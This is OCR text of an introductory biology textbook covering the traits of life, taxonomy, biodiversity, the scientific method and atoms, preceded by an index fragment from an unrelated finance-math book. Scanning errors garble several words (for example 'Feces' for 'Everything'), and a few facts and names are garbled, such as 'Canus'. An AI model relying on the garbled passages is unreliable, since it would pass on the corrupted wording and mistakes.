term life insurance, 213-214 
time 
calculating with speed/distance, 34 
driving, 244 
hourly employee, 224-225 
value of investing, 188-190 
time clock, 222-223 
timesheet, 221-223 
tipping 
calculating, 148-149, 245 
considerations about, 85 
customary, 148-149 
factoring in, 84 
formula, 148 
splitting, 149-150 
total cost of acquisition (TCA), 74-75 
total cost of ownership (TCO), 75-76 
tracking time, 221-223 
tradeoff, 78-79 


transportation costs, 151-153 
triangle 
area, calculating, 41-42 
defined, 39 
types, 39-40 
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U.S. Department of Energy website, 142 
U.S. Individual Income Tax Return, 
230-233 
U.S. Social Security Administration 
(SSA) website, 195 
UI (unemployment insurance), 214 
unbundling, goods or services, 77 
underemployed, 239 
underwriters, 207 
unemployment insurance (UI), 214 
unemployment rate, 239 
unit price 
calculating for packages, 92 
calculating for square footage, 92 
formula for determining, 79-80 
grocery comparison, 91 
United States customary units, 
50-51, 98 
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v (volume). See volume 
vacation time, 225 
variable (algebra), 28-29, 31 
VAT (value added tax), 65, 244 
vehicle registration fees, 177 
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Introduction 


[« is all around you, from invisible microbes and green 
plants to the other animals with whom you share the 
Earth. What’s more, these other living things aren’t just 
around you — they’re intimately interconnected with your 
life. Plants make your food and provide you with oxygen, 
microbes break down dead matter and recycle materials that 
all living things need, and insects pollinate the plants you rely 
on for food. Ultimately, all living beings rely on other living 
beings for their survival. 


What makes biology so great is that it allows you to explore 
the interconnectedness of the world’s organisms and really 
understand that living beings are works of art and machines 
rolled into one. Organisms can be as delicate as a mountain 
wildflower or as awe-inspiring as a majestic lion. And regard- 
less of whether they’re plants, animals, or microbes, all living 
things have numerous working parts that contribute to the 
function of the whole being. They move, obtain energy, use 
raw materials, and make waste, whether they’re as simple as a 
single-celled organism or as complex as a human being. 


Biology is the key you need to unlock the mysteries of life. 
Through it, you discover that even single-celled organisms 
have their complexities, from their unique structures to their 
diverse metabolisms. Biology also helps you realize what a 
truly miraculous machine your body is, with its many differ- 
ent systems that work together to move materials, support 
your structure, send signals, defend you from invaders, and 
obtain the matter and energy you need for growth. 


About This Book 


Biology Essentials For Dummies takes a look at the characteris- 
tics all living things share. It also provides an overview of the 
concepts and processes that are fundamental to living things. 
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Biology Essentials For Dummies 


We put an emphasis on looking at how human beings meet 
their needs, but we also take a look at the diversity of life on 
planet Earth. 


Conventions Used in This Book 


To help you find your way through the subjects in this book, 
we use the following style conventions: 


Italics highlight new words or terms that are defined 
in the text. They also point out words we want to 
emphasize. 


Also, whenever we introduce scientific terms, we try to 
break the words down for you so that the terms become 
tied to their meanings, making them easier to remember. 


Foolish Assumptions 


As we wrote this book, we tried to imagine who you are and 
what you need in order to understand biology. Here’s what we 
came up with: 


¥ You're a high school student taking biology, possibly in 
preparation for an advanced placement test or college 
entrance examination. If you’re having trouble in biology 
class and your textbook isn’t making much sense, try read- 
ing the relevant section of this book first to give yourself a 
foundation and then go back to your textbook or notes. 


1# You're a college student who isn’t a science major but is 
taking a biology class to help fulfill your degree require- 
ments. If you want help following along in class, try read- 
ing the relevant sections in this book before you go toa 
lecture on a particular topic. If you need to fix a concept 
in your brain, read the related section after class. 


Icons Used in This Book 


We use some of the familiar For Dummies icons to help guide 
you and give you new insights as you read the material. Here’s 
the scoop on what each one means. 
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< MBER The information highlighted with this icon is stuff we think 
& you should permanently store in your mental biology file. If 
you want a quick review of biology, scan through the book 
reading only the paragraphs marked with Remember icons. 


air This bull’s-eye symbol offers pointers that help you remember 
the facts presented in a particular section so you can better 
commit them to memory. 


Where to Go from Here 


Where you start reading is up to you. However, we do havea 
few suggestions: 


If youre currently in a biology class and having trouble 
with a particular topic, jump right to the chapter or sec- 
tion featuring the subject that’s confusing you. 


1# If youre using this book as a companion to a biology 
class that’s just beginning, you can follow along with the 
topics being discussed in class. 


Whatever your situation, the table of contents and index can 
help you find the information you need. 


“You can do all the DNA testing you want 
Pinocchio, but I stilt feel this is your baby.” 


Chapter 1 


Exploring the Living World 


In This Chapter 
Identifying the characteristics of living things 
Introducing the three main types of living things 
Organizing living things into groups 
Valuing the diversity of life on Earth 
Observing the world like a scientist 


Bee is the study of life, as in the life that covers the 
surface of the Earth like a living blanket, filling every 
nook and cranny from dark caves and dry deserts to blue 
oceans and lush rain forests. Living things interact with all 
these environments and each other, forming complex, inter- 
connected webs of life. 


In this chapter, we give you an overview of the big concepts 
of biology. Our goal is to show you how biology connects to 
your life and to give you a preview of the topics we explore in 
greater detail later in this book. 


Living Things: Why Biologists 
Study Them, What Defines Them 


Biologists seek to understand everything they can about living 
things, including 


The structure and function of all the diverse living things 
on planet Earth 


1# The relationships between living things 
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How living things grow, develop, and reproduce, includ- 
ing how these processes are regulated by DNA, hor- 
mones, and nerve signals 


The connections between living things and their 
environment 


How living things change over time 


1# How DNA changes, how it’s passed from one living thing 
to another, and how it controls the structure and func- 
tion of living things 


Ry An individual living thing is called an organism. All organisms 
© share eight specific characteristics that define the properties 
of life: 


Living things are made of cells that contain DNA. A cell 
is the smallest part of a living thing that retains all the 
properties of life. In other words, it’s the smallest unit 
that’s alive. DNA, short for deoxyribonucleic acid, is the 
genetic material, or instructions, for the structure and 
function of cells. 


Living things maintain order inside their cells and 
bodies. One law of the universe is that everything tends 
to become random over time. According to this law, if 
you build a sand castle, it'll crumble back into sand over 
time. Living things, as long as they remain alive, don’t 
crumble into little bits. They constantly use energy to 
rebuild and repair themselves so that they stay intact. 


Living things regulate their systems. Living things main- 
tain their internal conditions in a way that supports life. 
Even when the environment around them changes, organ- 
isms attempt to maintain their internal conditions; this 
process is called homeostasis. Think about what happens 
when you go outside on a cool day without wearing a 
coat. Your body temperature starts to drop, and your 
body responds by pulling blood away from your extremi- 
ties to your core in order to slow the transfer of heat 
to the air. It may also trigger shivering, which gets you 
moving and generates more body heat. These responses 
keep your internal body temperature in the right range for 
your survival even though the outside temperature is low. 


Living things respond to signals in the environment. If 
you pop up suddenly and say “Boo!” to a rock, it doesn’t 
do anything. Pop up and say “Boo!” to a friend or a frog, 
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and you'll likely see him or it jump. That’s because living 
things have systems to sense and respond to signals (or 
stimuli). Many animals sense their environment through 
their five senses just like you do, but even less familiar 
organisms, such as plants and bacteria, can sense and 
respond. For example, during the process of phototaxis, 
plants direct their growth toward areas where they have 
access to light. 


Living things transfer energy among themselves and 
between themselves and their environment. Living 
things need a constant supply of energy to grow and 
maintain order. Organisms such as plants capture light 
energy from the Sun and use it to build food molecules 
that contain chemical energy. Then the plants, and other 
organisms that eat the plants, transfer the chemical 
energy from the food into cellular processes. As cellular 
processes occur, they transfer most of the energy back 
to the environment as heat. 


Living things grow and develop. You started life as a 
single cell. That cell divided to form new cells, which 
divided again. Now your body is made of approximately 
100 trillion cells. As your body grew, your cells received 
signals that told them to change and become special 
types of cells: skin cells, heart cells, liver cells, brain 
cells, and so on. Your body developed along a plan, with 
a head at one end and a “tail” at the other. The DNA in 
your cells controlled all these changes as your body 
developed. 


Living things reproduce. People make babies, hens 
make chicks, and plasmodial slime molds make plasmo- 
dial slime molds. When organisms reproduce, they pass 
copies of their DNA onto their offspring, ensuring that 
the offspring have some of the traits of the parents. 


Living things have traits that evolved over time. 
Birds can fly, but most of their closest relatives — the 
dinosaurs — couldn't. The oldest feathers seen in the 
fossil record are found on a feathered dinosaur called 
Archaeopteryx. No birds or feathers have been found in 
any fossils that are older than those of Archaeopteryx. 
From observations like these, scientists can infer that 
having feathers is a trait that wasn’t always present on 
Earth; rather, it’s a trait that developed at a certain point 
in time. So, today’s birds have characteristics that devel- 
oped through the evolution of their ancestors. 
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Meet Vour Neighbors: Looking 
at Life on Earth 
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Life on Earth is incredibly diverse, beautiful, and complex. 
Heck, you could spend a lifetime exploring the microbial 
universe alone. The deeper you delve into the living world 
around you, the more you can appreciate the similarities 
between all life on Earth — and be fascinated by the differ- 
ences. The following sections give you a brief introduction to 
the major categories of life on Earth (called domains, as we 
explain in the upcoming section “Organizing Life into Smaller 
and Smaller Groups: Taxonomy”). 


Unsung heroes: Bacteria 


Consisting mostly of single-celled organisms, bacteria are pro- 
karyotic, meaning they lack a nuclear membrane around their 
DNA. Most bacteria have a cell wall made of peptidoglycan: a 
hybrid sugar-protein molecule. 


Most people are familiar with disease-causing bacteria such 
as Streptococcus pyogenes, Mycobacterium tuberculosis, and 
Staphylococcus aureus. Yet the vast majority of bacteria on 
Earth don’t cause human diseases. Instead, they play impor- 
tant roles in the environment and health of living things, 
including humans. Photosynthetic bacteria make significant 
contributions to planetary food and oxygen production, and 
E. coli living in your intestines make vitamins that you need to 
stay healthy. So when you get down to it, plants and animals 
couldn’t survive on Earth without bacteria. 


Generally speaking, bacteria range in size from 1 to 10 
micrometers (one millionth of a meter) in length and are 
invisible to the naked eye. Along with being nucleus-free, they 
have a genome that’s a single circle of DNA. They reproduce 
asexually (meaning they produce copies of themselves) by a 
process called binary fission. 


Bacteria have many ways of getting the energy they need for 
growth and various strategies for surviving in extreme envi- 
ronments. Their great metabolic diversity has allowed them 
to colonize just about every environment on Earth. 
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Bacteria impersonators: 
Archaeans 


Archaeans are prokaryotes, just like bacteria. In fact, you can’t 
tell the difference between the two just by looking, even if 

you look very closely using an electron microscope, because 
they’re about the same size and shape, have similar cell struc- 
tures, and divide by binary fission. 


Until the 1970s, no one even knew that archaeans existed; up 
to that point, all prokaryotic cells were assumed to be bacte- 
ria. Then, in the 1970s, a scientist named Carl Woese started 
doing genetic comparisons between prokaryotes. Woese star- 
tled the entire scientific world when he revealed that prokary- 
otes actually separated into two distinct groups — bacteria 
and archaea — based on sequences in their genetic material. 


The first archaeans were discovered in extreme environments 
(think salt lakes and hot springs), so they have a reputation 
for being extremophiles (-phile means “love,” so extremophiles 
means “extreme-loving”). Since their initial discovery, how- 
ever, archaeans have been found everywhere scientists have 
looked for them. They’re happily living in the dirt outside 
your home right now, and they’re abundant in the ocean. 


Because archaeans were discovered fairly recently, scientists 
are still learning about their role on planet Earth, but so far it 
looks like they’re as abundant and successful as bacteria. 


A taste of the familiar: 
Eukaryotes 


Unless you’re a closet biologist, you’re probably most familiar 
with life in eukaryotic form because you encounter it every 
day. As soon as you step outside, you can find a wealth of 
plants and animals (and maybe even a mushroom or two if 
you look around a little). 


On the most fundamental level, all eukaryotes are quite 
similar. They share a common cell structure with nuclei and 
organelles, use many of the same metabolic strategies, and 
reproduce either asexually or sexually. 
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Despite these similarities, we bet you still feel that you’re 
pretty different from a carrot. You're right to feel that way. 
The differences between you and a carrot are what separate 
you into two different kingdoms. In fact, enough differences 
exist among eukaryotes to separate them into four different 
kingdoms: 


Animalia: Animals are organisms that begin life as a cell 
called a zygote that results from the fusion of a sperm 
and an egg. The fertilized egg then divides to form a 
hollow ball of cells called a blastula. If you’re wondering 
when the fur, scales, and claws come into play, these 
familiar animal characteristics get factored in much later, 
at the point when animals get divided up into phyla, fami- 
lies, and orders (see the “Organizing Life into Smaller and 
Smaller Groups: Taxonomy” section later in this chapter 
for more on these groupings). 


Plantae: Plants are photosynthetic organisms that start 
life as embryos supported by maternal tissue. This defini- 
tion of plants includes all the plants you’re familiar with: 
pine trees, flowering plants (including carrots), grasses, 
ferns, and mosses. All plants have cells with cell walls 
made of cellulose. They reproduce asexually by mitosis, 
but they can also reproduce sexually. 


The definition of plants, which specifies a stage where an 
embryo is supported by maternal tissue, excludes most 
of the algae, like seaweed, found on Earth. Algae and 
plants are so closely related that many people include 
algae in the plant kingdom, but many biologists draw the 
line at including algae in the plant kingdom. 


Fungi: Fungi may look a bit like plants, but they aren’t 
photosynthetic. They get their nutrition by breaking down 
and digesting dead matter. Their cells have walls made 
of chitin (a strong, nitrogen-containing polysaccharide). 
This kingdom includes mushrooms, molds that you see on 
your bread and cheese, and many rusts that attack plants. 
Yeast is also a member of this kingdom even though it 
grows differently; most fungi grow as filaments (that look 
like threads), but yeast grow as little oval cells. 


 Protista: This kingdom is defined as everything else 
that’s eukaryotic. Seriously. Biologists have studied 
animals, plants, and fungi for a long time and defined 
them as distinct groups long ago. But many, many, 
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eukaryotes don’t fit into these three kingdoms. A whole 
world of microscopic protists exists in a drop of pond 
water. The protists are so diverse that some biologists 
think they should be separated into as many as 11 king- 
doms of their own. 


Classifying Living Things 


Much like you’d draw a family tree to show the relationships 
between your parents, grandparents, and other members of 
your family, biologists use a phylogenetic tree (a drawing that 
shows the relationships among a group of organisms) to rep- 
resent the relationships among living things. 


Although you probably know how your family members are 
related to each other, biologists have to use clues to figure 
out the relationships among living things. The types of clues 
they use to figure out these relationships include 


Physical structures: The structures that biologists use 
for comparison may be large, like feathers, or very small, 
like a cell wall. 


Chemical components: Some organisms produce unique 
chemicals. Bacteria, for example, are the only cells 
that make the hybrid sugar-protein molecule called 
peptidoglycan. 


Genetic information: An organism’s genetic code deter- 
mines its traits, so by reading the genetic code in DNA, 
biologists can go right to the source of differences among 
species. 


MBER The more characteristics two organisms have in common 
with each other, the more closely related they are. 
Characteristics that organisms have in common are called 
shared characteristics. 


MBER Based on structural, cellular, biochemical, and genetic charac- 
teristics, biologists can classify life on Earth into groups that 
reflect the evolutionary history of the planet. That history 
indicates that all life on Earth began from one original univer- 
sal ancestor after the Earth formed 4.5 billion years ago. All 
the diversity of life that exists today is related because it’s 
descended from that original ancestor. 
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Organizing Life into Smaller and 
Smaller Groups: Taxonomy 
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Biologists need to work with small groups of living things in 
order to determine how similar the different types of organ- 
isms are. Hence, the creation of the taxonomic hierarchy, a 
naming system that ranks organisms by their evolutionary 
relationships. Within this hierarchy, living things are orga- 
nized from the largest, most-inclusive group down to the 
smallest, least-inclusive group. 


The taxonomic hierarchy is as follows, from largest to smallest. 


¥ Domain: Domains group organisms by fundamental 


characteristics such as cell structure and chemistry. For 
example, organisms in domain Eukarya are separated 
from those in the Bacteria and Archaea domains based 
on whether their cells have a nucleus, the types of mole- 
cules found in the cell wall and membrane, and how they 
go about protein synthesis. (We introduced the three 
domains in the earlier section “Meet Your Neighbors: 
Looking at Life on Earth.”) 


Kingdom: Kingdoms group organisms based on devel- 


opmental characteristics and nutritional strategy. For 
example, organisms in the animal kingdom (Animalia) 
are separated from those in the plant kingdom (Plantae) 
because of differences in the early development of these 
organisms and the fact that plants make their own food 
by photosynthesis, whereas animals ingest their food. 
(Kingdoms are most useful in domain Eukarya because 
they’re not well defined for the prokaryotic domains.) 


Phylum: Phyla separate organisms based on key char- 


acteristics that define the major groups within the king- 
dom. For example, within kingdom Plantae, flowering 
plants (Angiosperms) are in a different phylum than 
cone-bearing plants (Conifers). 


Class: Classes separate organisms based on key charac- 


teristics that define the major groups within the phylum. 
For example, within phylum Angiophyta, plants that have 
two seed leaves (dicots, class Magnoliopsida) are ina 


ar 
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separate class than plants with one seed leaf (monocots, 
class Liliopsida). 


Order: Orders separate organisms based on key charac- 
teristics that define the major groups within the class. 
For example, within class Magnoliopsida, nutmeg plants 
(Magnoliales) are put in a different order than black 
pepper plants (Piperales) due to differences in their 
flower and pollen structure. 


Family: Families separate organisms based on key 
characteristics that define the major groups within the 
order. For example, within order Magnoliales, buttercups 
(Ranunculaceae) are in a different family than roses 
(Rosaceae) due to differences in their flower structure. 


Genus: Genera separate organisms based on key charac- 
teristics that define the major groups within the family. 
For example, within family Rosaceae, roses (Rosa) are in 
a different genus than cherries (Prunus) thanks to differ- 
ences in their flower structure. 


1# Species: Species separate eukaryotic organisms based 
on whether they can successfully reproduce with each 
other. You can walk through a rose garden and see many 
different colors of China roses (Rosa chinensis) that are 
all considered one species because they can reproduce 
with each other. 


Think of how biologists organize living things like how you 
might organize your clothing. In your first round of organiz- 
ing, you might make groups of pants, shirts, socks, and shoes. 
From there, you might go into the shirt group and organize 
your shirts into smaller groups, such as short-sleeved versus 
long-sleeved shirts. Then perhaps you’d organize them by type 
of fabric, then color, and so on. At some point, you’d have 
very small groups with very similar articles of clothing — 
perhaps a group of two short-sleeved, button-down, blue 
shirts, for example. All your clothing would be organized in a 
hierarchy, from the big category of clothing all the way down 
to the small category of short-sleeved, button-down, blue 
shirts. 


Table 1-1 compares the classification, or taxonomy, of you, a 
dog, a carrot, and E. coli. 
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Table 1-1 Comparing the Taxonomy of Several Species 


Taxonomic Human Dog Carrot E. coli 
Group 
Domain Eukarya Eukarya Eukarya Bacteria 
Kingdom Animalia Animalia Plantae Eubacteria 
Phylum Chordata Chordata Angiophyta Proteobacteria 
Class Mammalia Mammalia Magnoliopsida Gammaproteobacteria 
Order Primates Carnivora Apiales Enterobacteriales 
Family Hominidae Canidae Apiaceae Enterobacteriaceae 
(Umbelliferae) 
Genus Homo Canus Daucus Escherichia 
Species H. sapiens C. familiaris D. carota E. coli 
Of the organisms listed in Table 1-1, you have the most in 
common with a dog. You’re both animals possessing a central 
nervous chord (phylum Chordata), and you’re both mammals 
(class Mammalia), which means you have hair and the females 
of your species make milk. However, you also have many dif- 
ferences, including the tooth structure that separates you into 
the order Primates and a dog into the order Carnivora. If you 
compare yourself to a plant, you can see that you have certain 
features of cell structure that place you together in domain 
Eukarya, but little else in common. 
MBER Two organisms that belong to the same species are the most 
& similar of all. For most eukaryotic organisms, members of the 


same species can successfully sexually reproduce together, 
producing live offspring that can also reproduce. Bacteria and 
archaea don’t reproduce sexually, so their species are defined 
by chemical and genetic similarities. 


Biodiversity: Our Differences 
Make Us Stronger 


The diversity of living things on Earth is referred to as bio- 
diversity. Almost everywhere biologists have looked on 
this planet — from the deepest, darkest caves to the lush 
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Amazonian rain forests to the depths of the oceans — they’ve 
found life. In the deepest, darkest caves where no light ever 
enters, bacteria obtain energy from the metals in the rocks. In 
the Amazonian rain forest, plants grow attached to the tops of 
trees, collecting water and forming little ponds in the sky that 
become home to insects and tree frogs. In the deep oceans, 
blind fish and other animals live on the debris that drifts 
down to them like snow from the lit world far above. Each of 
these environments presents a unique set of resources and 
challenges, and life on Earth is incredibly diverse due to the 
ways in which organisms have responded to these challenges 
over time. 


The following sections clue you in not only to the reasons 
why biodiversity is so important and how human actions are 
harming it but also how human actions can protect biodiver- 
sity moving forward. 


Valuing biodiversity 


Biodiversity is important — and worth valuing — for the fol- 
lowing reasons: 


Y The health of natural systems depends on biodiversity. 
Scientists who study the interconnections between differ- 
ent types of living things and their environments believe 
that biodiversity is important for maintaining balance 
in natural systems. Each type of living thing plays a role 
in its environment, and the loss of even one species can 
have widespread effects. 


“ Many economies rely upon natural environments. A 
whole industry called ecotourism has grown up around 
tour guides leading people on trips through natural habi- 
tats and explaining the local biology along the way. 


/ Human medicines come from other living things. For 
example, the anticancer drug paclitaxel (Taxol) was origi- 
nally obtained from the bark of the Pacific yew, and the 
heart medicine digitalin comes from the foxglove plant. 


Biodiversity adds to the beauty of nature. Natural sys- 
tems have an aesthetic value that’s pleasing to the eye 
and calming to the mind in today’s technologically driven 
world. 
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Surveying the threats posed 
by human actions 


As the human population grows and uses more and more of 
the Earth’s resources, the populations of other species are 
declining as a direct result. Following are the ways in which 
human actions pose major threats to biodiversity: 


Development is reducing the size of natural environ- 
ments. People need places to live and farms to raise 
food. In order to meet these needs, they burn rain for- 
ests, drain wetlands, cut down forests, pave over valleys, 
and plow up grasslands. Whenever people convert land 
for their own use, they destroy the habitats of other spe- 
cies, causing habitat loss. 


/ Unnatural, human-produced wastes are polluting the 
air and water. Automobiles and factories burn gasoline 
and coal, releasing pollution into the air. Metals from 
mining and chemicals from factories, farms, and homes 
get into groundwater. After pollution enters the air and 
water, it travels around the globe and can hurt multiple 
species, including humans. 


The overharvesting of species to provide food and 
other materials for human consumption is driving some 
species to near extinction. Because they can repro- 
duce, living things such as trees and fish are considered 
renewable resources. However, if people harvest these 
resources faster than they can replace themselves, the 
numbers of individual trees and fish decline. If too few 
members of a species remain, the survival of that species 
becomes very unlikely. 


1” Human movements around the globe sometimes carry 
species into new environments. An introduced (or non- 
native) species is a foreign species that’s brought into 
anew environment. Introduced species that are very 
aggressive and take over habitats are called invasive spe- 
cies. Invasive species often have a large environmental 
impact and cause the numbers of native species (organ- 
isms belonging to a particular habitat) to decline; they 
can also attack crop plants and cause human diseases. 


MBER 
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Exploring the extinction of species 


The combined effects of all the various human actions in 
Earth’s ecosystems are reducing the planet’s biodiversity. In 
fact, the rate of extinctions is increasing along with the size of 
the human population. No one knows for certain how exten- 
sive the loss of species due to human impacts will ultimately 
be, but there’s no question that human practices such as 
hunting and farming have already caused numerous species 
to become extinct. 


Many scientists believe Earth is experiencing its sixth mass 
extinction, a certain time period in geologic history that shows 
dramatic losses of many species. (The most famous mass 
extinction event is the one that occurred about 65 million years 
ago and included the extinction of the dinosaurs.) Scientists 
theorize that most of the past mass extinctions were caused by 
major changes in Earth’s climate and that the current extinc- 
tions (most recently including black rhinos, Zanzibar leopards, 
and golden toads) began as a result of human land use but may 
increase as a result of global warming. 


The loss in biodiversity that’s currently happening on Earth 
could have effects beyond just the loss of individual species. 
Living things are connected to each other and their environ- 
ment in how they obtain food and other resources necessary 
for survival. If one species depends on another for food, for 
example, then the loss of a prey species can cause a decline in 
the predator species. 


The sections that follow introduce you to two classifications 
of species that biologists are keeping an eye on when it comes 
to questions of extinction. 


Keystone species 


Some species are so connected with other organisms in their 
environment that their extinction changes the entire com- 
position of species in the area. Species that have such great 
effects on the balance of other species in their environment 
are called keystone species. As biodiversity decreases, key- 
stone species may die out, causing a ripple effect that leads 
to the loss of many more species. If biodiversity gets too low, 
then the future of life itself becomes threatened. 
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An example of a keystone species is the purple seastar, which 
lives on the northwest Pacific coast of the United States. 
Purple seastars prey on mussels in the intertidal zone. When 
the seastars are present, they keep the mussel population in 
check, allowing a great diversity of other marine animals to 
live in the intertidal zone. If the seastars are removed from 
the intertidal zone, however, the mussels take over, and many 
species of marine animals disappear from the environment. 


Indicator species 


One way biologists can monitor the health of particular envi- 
ronments and the organisms that live in them is by measuring 
the success of indicator species: species whose presence 

or absence in an environment gives information about that 
environment. 


In the Pacific Northwest region of the United States, the health 
of old-growth forests is measured by the success of the north- 
ern spotted owl, a creature that can make its home and find 
food only in mature forests that are hundreds of years old. As 
logging decreases the number and size of these old forests, 
the number of spotted owls has declined, thereby making the 
number of spotted owls an indicator of the health, or even the 
existence, of old-growth forests in the Pacific Northwest. Of 
course, old-growth forests aren’t just home to spotted owls — 
they shelter a rich diversity of living things including plants, 
such as sitka spruce and Western hemlock, and animals, such 
as elk, bald eagles, and flying squirrels. Old-growth forests 
also perform important environmental functions such as pre- 
venting erosion, floods, and landslides; improving water qual- 
ity; and providing places for salmon to spawn. If old-growth 
forests become extinct in the Pacific Northwest, the effects 
will be far reaching and have many negative impacts on the 
people and other species in the area. 


Protecting biodiversity 


Biodiversity increases the chance that at least some living 
things will survive in the face of large changes in the environ- 
ment, which is why protecting it is crucial. What can people 
do to protect biodiversity and the health of the environment 
in the face of the increasing demands of the human popula- 
tion? No one has all the answers, but here are a few ideas 
worth trying: 
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1# Keep wild habitats as large as possible and connect 
smaller ones with wildlife corridors (stretches of land or 
water that wild animals travel as they migrate or search 
for food) so organisms that need a big habitat to thrive 
can move among smaller ones. 


Use existing technologies and develop new ones to 
decrease human pollution and clean up damaged habi- 
tats. Technologies that have minimal effects on the envi- 
ronment are called clean or green technologies. Some 
businesses are trying to use these technologies in order 
to reduce their impact on the environment. 


Strive for sustainability in human practices includ- 
ing manufacturing, fishing, logging, and agriculture. 
Something that’s sustainable meets current human needs 
without decreasing the ability of future generations to 
meet their needs. 


Regulate the transport of species around the world so 
that species aren’t introduced into foreign habitats. This 
step includes being careful about the transport of not-so- 
obvious species. For example, ships traveling from one 
port to another are often asked to empty their ballast 
water offshore so they don’t accidentally release organ- 
isms from other waters into their destination harbors. 


Making Sense of the World 
through Observations 


The true heart of science isn’t a bunch of facts — it’s the 
method that scientists use to gather those facts. Science 

is about exploring the natural world, making observations 
using the five senses, and attempting to make sense of those 
observations. Scientists, including biologists, use two main 
approaches when trying to make sense of the natural world: 


1# Discovery science: When scientists seek out and observe 
living things, they’re engaging in discovery science, study- 
ing the natural world and looking for patterns that lead 
to new, tentative explanations of how things work (these 
explanations are called hypotheses). If a biologist doesn’t 
want to disturb an organism’s habitat, he or she may use 
observation to find out how a certain animal lives in its 
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natural environment. Making useful scientific observa- 
tions involves writing detailed notes about the routine of 
the animal for a long period of time (usually years) to be 
sure that the observations are accurate. 


 Hypothesis-based science: When scientists test their 
understanding of the world through experimentation, 
they’re engaging in hypothesis-based science, which usu- 
ally calls for following some variation of a process called 
the scientific method (which we explain in a moment). 
Modern biologists are using hypothesis-based science to 
try to understand many things, including the causes and 
potential cures of human diseases and how DNA controls 
the structure and function of living things. 


Hypothesis-based science can be a bit more complex than 
discovery science and relies on the scientific method. The 
scientific method is basically a plan that scientists follow while 
performing scientific experiments and writing up the results. 
It allows experiments to be duplicated and results to be 
communicated uniformly. Here’s the general process of the 
scientific method: 


1. Make observations and come up with questions. 


The scientific method starts when scientists notice 
something and ask questions like “What’s that?” or 
“How does it work?” just like a child might when he 
sees something new. 


2. Form a hypothesis. 


Much like Sherlock Holmes, scientists piece together 
clues to try to come up with the most likely hypoth- 
esis (explanation) for a set of observations. This 
hypothesis represents scientists’ thinking about pos- 
sible answers to their questions. 


Say, for example, a marine biologist is exploring some 
rocks along a beach and finds a new worm-shaped 
creature he has never seen before. His hypothesis is 
that the creature is some kind of worm. 


One important point about a scientific hypothesis is 

that it must be testable, or falsifiable. In other words, 
it has to be an idea that you can support or reject by 
exploring the situation further using your five senses. 
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3. Make predictions and design experiments to test the 
idea(s). 


Predictions set up the framework for an experiment 
to test a hypothesis, and they’re typically written as 
“if... then” statements. 


If the marine biologist predicts that the creature he 
found is a worm, then its internal structures should 
look like those in other worms he has studied. 


4. Test the idea(s) through experimentation. 


Scientists must design their experiments carefully in 
order to test just one idea at a time. As they conduct 
their experiments, scientists make observations 
using their five senses and record these observations 
as their results or data. Scientists conduct multiple 
tests to ensure that their observations are repeatable. 


Continuing with the worm example, the marine biolo- 
gist tests his hypothesis by dissecting the wormlike 
creature, examining its internal parts carefully with 
the assistance of a microscope, and making detailed 
drawings of its internal structures. 


5. Make conclusions about the findings. 


Scientists interpret the results of their experiments 
through deductive reasoning, using their specific 
observations to test their general hypothesis. When 
making deductive conclusions, scientists consider 
their original hypothesis and ask whether it could still 
be true in light of the new information gathered during 
the experiment. If so, the hypothesis can remain as a 
possible explanation for how things work. If not, scien- 
tists reject the hypothesis and try to come up with an 
alternate explanation (a new hypothesis) that could 
explain what they’ve seen. 


In the worm example, the marine biologist discovers 
that the internal structures of the wormlike creature 
look very similar to another type of worm he’s familiar 
with. He can therefore conclude that the new animal is 
likely a relative of that other type of worm. 


6. Communicate the conclusions with other scientists. 


Communication is a huge part of science. Without it, 
discoveries can’t be passed on, and old conclusions 
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can’t be tested with new experiments. When scientists 
complete some work, they write a paper that explains 
exactly what they did, what they saw, and what they 
concluded. Then they submit that paper to a scientific 
journal in their field. Scientists also present their work 
to other scientists at meetings, including those spon- 
sored by scientific societies. In addition to sponsoring 
meetings, these societies support their respective dis- 
ciplines by printing scientific journals and providing 
assistance to teachers and students in the field. 


Chapter 2 
The Chemistry of Life 


In This Chapter 
Seeing why matter is so important 
Distinguishing atoms, elements, isotopes, molecules, and compounds 
Getting to know acids and bases 


Understanding the structure and function of important molecules 
for life 


Feces that has mass and takes up space, includ- 

ing you and the rest of life on Earth, is made of matter. 
Atoms make up molecules, which make up the substance 

of living things. Carbohydrates, proteins, nucleic acids, and 
lipids are four kinds of molecules that are especially impor- 
tant to the structure and function of organisms. In this chap- 
ter, we present a bit of the basic chemistry that’s essential for 
understanding biology. 


Exploring Why Matter Matters 


Matter is the stuff of life — literally. Every living thing is made 
of matter. In order to grow, living things must get more matter 
to build new structures. When living things die, be they plants 
or animals, microbes such as bacteria and fungi digest the 
dead matter and recycle it so that other living things can use 
it again. In fact, pretty much all the matter on Earth has been 
here since the planet formed 4.5 billion years ago; it has just 
been recycled since then. So, the stuff that makes up your 
body may once have been part of Tyrannosaurus rex, a butter- 
fly, or even a bacterium. 
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Following are a few facts you should know about matter: 


1# Matter takes up space. Space is measured in volume, and 
volume is measured in liters (L). 


Matter has mass. Mass is the term for describing the 
amount of matter that a substance has. It’s measured 
in grams (g). Earth’s gravity pulls on your mass, so the 
more mass you have, the more you weigh. 


¥ Matter can take several forms. The most familiar forms 
of matter are solids, liquids, and gases. Solids have a defi- 
nite shape and size, such as a person or a brick. Liquids 
have a definite volume. They can fill a container, but they 
take the shape of the container that they fill. Gases are 
easy to compress and expand to fill a container. 


To understand the difference between mass and weight, com- 
pare your weight on Earth versus your weight on the Moon. 
No matter where you are, your body is made of the same 
amount of stuff, or matter. But the Moon is so much smaller 
than Earth that it has a lot less gravity to pull on your mass. 
So, your weight on the Moon would be just one-sixth of your 
weight on Earth, but your mass would remain the same. 


The Differences among Atoms, 
Elements, and Isotopes 


All matter is composed of elements. When you break down 
matter into its smallest components, you’re left with indi- 
vidual elements that themselves break down into atoms con- 
sisting of even smaller pieces called subatomic particles. And 
sometimes the number of those subatomic particles within a 
particular atom differs, creating isotopes. This section has the 
scoop on all these components of matter. 


Tiny, mighty atoms 


An atom is the smallest whole, stable piece of an element that 
still has all the properties of that element. It’s the smallest 
“piece” of matter that can be measured. 
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Here’s the basic breakdown of an atom’s structure: 


1” The core of an atom, called the nucleus, contains two 
kinds of subatomic particles: protons and neutrons. 
Both have mass, but only one carries any kind of charge. 
Protons carry a positive charge, but neutrons have no 
charge (they’re neutral). Because the protons are posi- 
tive and the neutrons have no charge, the net charge of 
an atom’s nucleus is positive. 


Clouds of electrons surround the nucleus. Electrons 
carry a negative charge but have almost no mass. 


Atoms become ions when they gain or lose electrons. In other 
words, ions are essentially charged atoms. Positive (+) ions 
have more protons than electrons; negative (—) ions have 
more electrons than protons. Positive and negative charges 
attract one another, allowing atoms to form bonds, as we 
explain in the upcoming “Molecules, Compounds, and Bonds” 
